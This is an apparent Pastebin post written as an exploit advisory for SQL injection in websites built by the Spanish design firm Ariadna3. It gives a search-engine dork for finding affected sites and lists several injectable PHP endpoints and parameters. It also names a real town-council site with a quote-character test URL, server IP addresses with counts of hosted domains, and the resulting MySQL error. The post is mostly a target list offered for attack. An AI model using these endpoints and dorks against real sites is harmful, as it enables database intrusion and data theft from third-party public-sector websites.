KingSkrupellos

Ariadna3 Web Design Spain SQL Injection

Jan 14th, 2019
74
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.92 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Ariadna3 Web Design Spain SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 15/01/2019
  7. # Vendor Homepage : ariadna3.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : intext:''Powered by ariadna3.com''
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14.  
  15. ####################################################################
  16.  
  17. # SQL Injection Exploit :
  18. ***********************
  19.  
  20. /THIS-PATH-CHANGES/fotografia-galerias.php?ID=[SQL Injection]
  21.  
  22. /turismo/fotografia-galerias.php?ID=[SQL Injection]
  23.  
  24. /participa/resource-visagen2.php?sc=participa&ap=actividades&ID=[SQL Injection]
  25.  
  26. /rutadeldestierro/lib/visualimg.php?IDimg=[SQL Injection]
  27.  
  28. /ayuntamiento/noticias.php?ID=[SQL Injection]
  29.  
  30. /noticias.php?ID=[SQL Injection]
  31.  
  32. /ayuntamiento/bandos.php?ID=[SQL Injection]
  33.  
  34. /bandos.php?ID=[SQL Injection]
  35.  
  36. ####################################################################
  37.  
  38. # Example Vulnerable Site :
  39. *************************
  40.  
  41. [+] aytoateca.es/turismo/fotografia-galerias.php?ID=59%27 =>
  42.  
  43. [ Proof of Concept ] => archive.is/ePNRc
  44.  
  45. Note : (46.231.127.49) => There are 267 domains hosted on this server.
  46.  
  47. Note : (46.231.127.24) => There are 293 domains hosted on this server.
  48.  
  49. ####################################################################
  50.  
  51. # SQL Database Error :
  52. **********************
  53.  
  54. You have an error in your SQL syntax; check the manual that corresponds
  55.  
  56. to your MySQL server version for the right syntax to use near '\'' at line 1
  57.  
  58. ####################################################################
  59.  
  60. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  61.  
  62. ####################################################################
Add Comment
Please, Sign In to add comment